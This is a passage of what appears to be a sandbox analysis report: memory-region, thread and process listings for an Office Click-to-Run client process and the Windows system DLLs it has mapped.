entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 4045 start_va = 0xce0000 end_va = 0xceffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 4046 start_va = 0x11c0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 4047 start_va = 0x1400000 end_va = 0x14fffff entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 4048 start_va = 0x16a0000 end_va = 0x179ffff entry_point = 0x0 region_type = private name = "private_0x00000000016a0000" filename = "" Region: id = 4049 start_va = 0x1810000 end_va = 0x190ffff entry_point = 0x0 region_type = private name = "private_0x0000000001810000" filename = "" Region: id = 4050 start_va = 0x19a0000 end_va = 0x1a9ffff entry_point = 0x0 region_type = private name = "private_0x00000000019a0000" filename = "" Region: id = 4051 start_va = 0x1b50000 end_va = 0x1bcffff entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 4052 start_va = 0x1c00000 end_va = 0x1cfffff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 4053 start_va = 0x1d00000 end_va = 0x2042fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d00000" filename = "" Region: id = 4054 start_va = 0x2050000 end_va = 0x210ffff entry_point = 0x2050000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4055 start_va = 0x2170000 end_va = 0x226ffff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 4056 start_va = 0x2300000 end_va = 0x23fffff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 4057 start_va = 0x2550000 end_va = 0x264ffff entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 4058 start_va = 0x777b0000 end_va = 0x777b2fff entry_point = 0x777b0000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 4059 start_va = 0x7fef46b0000 end_va = 0x7fef46cbfff entry_point = 0x7fef46b0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 4060 start_va = 0x7fef46d0000 end_va = 0x7fef4731fff entry_point = 0x7fef46d0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 4061 start_va = 0x7fef53d0000 end_va = 0x7fef53d7fff entry_point = 0x7fef53d0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4062 start_va = 0x7fef61c0000 end_va = 0x7fef6223fff entry_point = 0x7fef61c0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4063 start_va = 0x7fef6230000 end_va = 0x7fef62a0fff entry_point = 0x7fef6230000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4064 start_va = 0x7fef97e0000 end_va = 0x7fef99fcfff entry_point = 0x7fef97e0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 4065 start_va = 0x7fef9a00000 end_va = 0x7fef9d15fff entry_point = 0x7fef9a00000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 4066 start_va = 0x7fefad50000 end_va = 0x7fefad67fff entry_point = 0x7fefad50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4067 start_va = 0x7fefad70000 end_va = 0x7fefad80fff entry_point = 0x7fefad70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4068 start_va = 0x7fefae40000 end_va = 0x7fefae48fff entry_point = 0x7fefae40000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 4069 start_va = 0x7fefaff0000 end_va = 0x7fefaffafff entry_point = 0x7fefaff0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4070 start_va = 0x7fefb000000 end_va = 0x7fefb026fff entry_point = 0x7fefb000000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4071 start_va = 0x7fefb1a0000 end_va = 0x7fefb1b4fff entry_point = 0x7fefb1a0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4072 start_va = 0x7fefb4a0000 end_va = 0x7fefb4ccfff entry_point = 0x7fefb4a0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4073 start_va = 0x7fefb5b0000 end_va = 0x7fefb5c0fff entry_point = 0x7fefb5b0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 4074 start_va = 0x7fefb9e0000 end_va = 0x7fefba14fff entry_point = 0x7fefb9e0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 4075 start_va = 0x7fefc030000 end_va = 0x7fefc223fff entry_point = 0x7fefc030000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 4076 start_va = 0x7fefca20000 end_va = 0x7fefca29fff entry_point = 0x7fefca20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 4077 start_va = 0x7fefcc40000 end_va = 0x7fefcc9afff entry_point = 0x7fefcc40000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4078 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4079 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4080 start_va = 0x7fefd530000 end_va = 0x7fefd53efff entry_point = 0x7fefd530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4081 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4082 start_va = 0x7fefdbb0000 end_va = 0x7fefdcd9fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 4083 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4084 start_va = 0x7fefec10000 end_va = 0x7fefed87fff entry_point = 0x7fefec10000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 4085 start_va = 0x7feff080000 end_va = 0x7feff2d8fff entry_point = 0x7feff080000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4086 start_va = 0x7feff4e0000 end_va = 0x7feff531fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 4087 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4088 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4089 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 4090 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 4091 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4092 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4093 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4094 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 4156 start_va = 0x7fef3280000 end_va = 0x7fef3298fff entry_point = 0x7fef3280000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 4157 start_va = 0x7fefade0000 end_va = 0x7fefadf4fff entry_point = 0x7fefade0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 4158 start_va = 0x7fefd3c0000 end_va = 0x7fefd3cafff entry_point = 0x7fefd3c0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Thread: id = 200 os_tid = 0x6c8 Thread: id = 265 os_tid = 0x910 Thread: id = 267 os_tid = 0x8c8 Thread: id = 269 os_tid = 0x9f4 Thread: id = 270 os_tid = 0x708 Thread: id = 273 os_tid = 0x8bc Thread: id = 275 os_tid = 0x804 Thread: id = 277 os_tid = 0x95c Thread: id = 280 os_tid = 0x72c Thread: id = 281 os_tid = 0x124 Thread: id = 282 os_tid = 0x76c Thread: id = 289 os_tid = 0x480 Thread: id = 294 os_tid = 0x138 Thread: id = 298 os_tid = 0xac4 Thread: id = 302 os_tid = 0xc0 Process: id = "29" image_name = "officec2rclient.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe" page_root = "0x45312000" os_pid = "0xad8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x350" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\" /WatchService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d2d7" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3303 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3304 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3305 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3306 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 3307 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3308 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3309 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3310 start_va = 0x13f200000 end_va = 0x140242fff entry_point = 0x13f200000 region_type = mapped_file name = "officec2rclient.exe" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe") Region: id = 3311 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3312 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3313 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3314 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3581 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3582 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3583 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3648 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3649 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3650 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 3651 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3652 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3653 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3654 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3655 start_va = 0x7fef79c0000 end_va = 0x7fef79c6fff entry_point = 0x7fef79c0000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 3656 start_va = 0x7fef7fa0000 end_va = 0x7fef801bfff entry_point = 0x7fef7fa0000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 3657 start_va = 0x7fef8320000 end_va = 0x7fef8395fff entry_point = 0x7fef8320000 region_type = mapped_file name = "apiclient.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll") Region: id = 3658 start_va = 0x7fef83e0000 end_va = 0x7fef83e2fff entry_point = 0x7fef83e0000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 3659 start_va = 0x7fef83f0000 end_va = 0x7fef83f2fff entry_point = 0x7fef83f0000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 3660 start_va = 0x7fef8400000 end_va = 0x7fef8402fff entry_point = 0x7fef8400000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 3661 start_va = 0x7fef8410000 end_va = 0x7fef8412fff entry_point = 0x7fef8410000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 3662 start_va = 0x7fef8420000 end_va = 0x7fef8424fff entry_point = 0x7fef8420000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 3663 start_va = 0x7fef8430000 end_va = 0x7fef8434fff entry_point = 0x7fef8430000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 3664 start_va = 0x7fef8440000 end_va = 0x7fef8442fff entry_point = 0x7fef8440000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 3665 start_va = 0x7fef8450000 end_va = 0x7fef84ecfff entry_point = 0x7fef8450000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll") Region: id = 3666 start_va = 0x7fef84f0000 end_va = 0x7fef84f3fff entry_point = 0x7fef84f0000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 3667 start_va = 0x7fef8500000 end_va = 0x7fef8503fff entry_point = 0x7fef8500000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 3668 start_va = 0x7fef8510000 end_va = 0x7fef8512fff entry_point = 0x7fef8510000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 3669 start_va = 0x7fef8520000 end_va = 0x7fef8523fff entry_point = 0x7fef8520000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 3670 start_va = 0x7fef8530000 end_va = 0x7fef8532fff entry_point = 0x7fef8530000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll") Region: id = 3671 start_va = 0x7fef8540000 end_va = 0x7fef8542fff entry_point = 0x7fef8540000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 3672 start_va = 0x7fef8550000 end_va = 0x7fef8552fff entry_point = 0x7fef8550000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3673 start_va = 0x7fef8560000 end_va = 0x7fef8562fff entry_point = 0x7fef8560000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 3674 start_va = 0x7fef8570000 end_va = 0x7fef8572fff entry_point = 0x7fef8570000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll") Region: id = 3675 start_va = 0x7fef8580000 end_va = 0x7fef8582fff entry_point = 0x7fef8580000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 3676 start_va = 0x7fef8590000 end_va = 0x7fef8681fff entry_point = 0x7fef8590000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll") Region: id = 3677 start_va = 0x7fef8690000 end_va = 0x7fef8693fff entry_point = 0x7fef8690000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 3678 start_va = 0x7fef86a0000 end_va = 0x7fef86b6fff entry_point = 0x7fef86a0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll") Region: id = 3679 start_va = 0x7fef86c0000 end_va = 0x7fef86dafff entry_point = 0x7fef86c0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 3680 start_va = 0x7fef8a30000 end_va = 0x7fef8a56fff entry_point = 0x7fef8a30000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 3681 start_va = 0x7fef8bc0000 end_va = 0x7fef8c10fff entry_point = 0x7fef8bc0000 region_type = mapped_file name = "concrt140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll") Region: id = 3682 start_va = 0x7fef8c20000 end_va = 0x7fef8c3dfff entry_point = 0x7fef8c20000 region_type = mapped_file name = "hlink.dll" filename = "\\Windows\\System32\\hlink.dll" (normalized: "c:\\windows\\system32\\hlink.dll") Region: id = 3683 start_va = 0x7fefb0d0000 end_va = 0x7fefb0dafff entry_point = 0x7fefb0d0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 3684 start_va = 0x7fefb880000 end_va = 0x7fefb890fff entry_point = 0x7fefb880000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3685 start_va = 0x7fefbc30000 end_va = 0x7fefbe44fff entry_point = 0x7fefbc30000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 3686 start_va = 0x7fefd5d0000 end_va = 0x7fefd5defff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3687 start_va = 0x7fefd680000 end_va = 0x7fefd6b9fff entry_point = 0x7fefd680000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3688 start_va = 0x7fefd6c0000 end_va = 0x7fefd6d9fff entry_point = 0x7fefd6c0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3689 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3690 start_va = 0x7fefd8c0000 end_va = 0x7fefd8f5fff entry_point = 0x7fefd8c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = 